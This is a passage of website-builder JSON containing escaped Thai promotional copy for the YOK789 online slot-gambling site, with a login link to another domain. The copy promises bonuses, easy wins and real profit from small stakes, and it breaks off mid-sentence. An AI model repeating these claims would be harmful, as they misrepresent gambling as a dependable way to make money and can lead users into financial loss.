400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><h3><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/h3><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14<\\/span><\\/b><\\/p><ul><li><h3><b><span style=\\\"color: #99cc00;\\\">\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span> <\\/b><\\/h3><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e07\\u0e1a\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e2d\\u0e22\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e01\\u0e23\\u0e30\\u0e40\\u0e1b\\u0e4b\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e21\\u0e35\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e14\\u0e14\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e1b\\u0e31\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e21\\u0e32\\u0e01\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1a\\u0e48\\u0e07\\u0e0a\\u0e19\\u0e0a\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e17\\u0e48\\u0e32\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/b><\\/p><ul><li><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e04\\u0e23\\u0e1a <\\/b><\\/span><\\/h3><\\/li><\\/ul><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e27\\u0e31\\u0e12\\u0e19\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e49\\u0e33\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e08\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e0a\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e23\\u0e30\\u0e08\\u0e32\\u0e22\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e01\\u0e47\\u0e21\\u0e35\\u0e15\\u0e31\\u0e27\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e14\\u0e23\\u0e2d\\u0e1b \\u0e43\\u0e04\\u0e23\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e46 \\u0e01\\u0e47\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e25\\u0e31\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e27\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 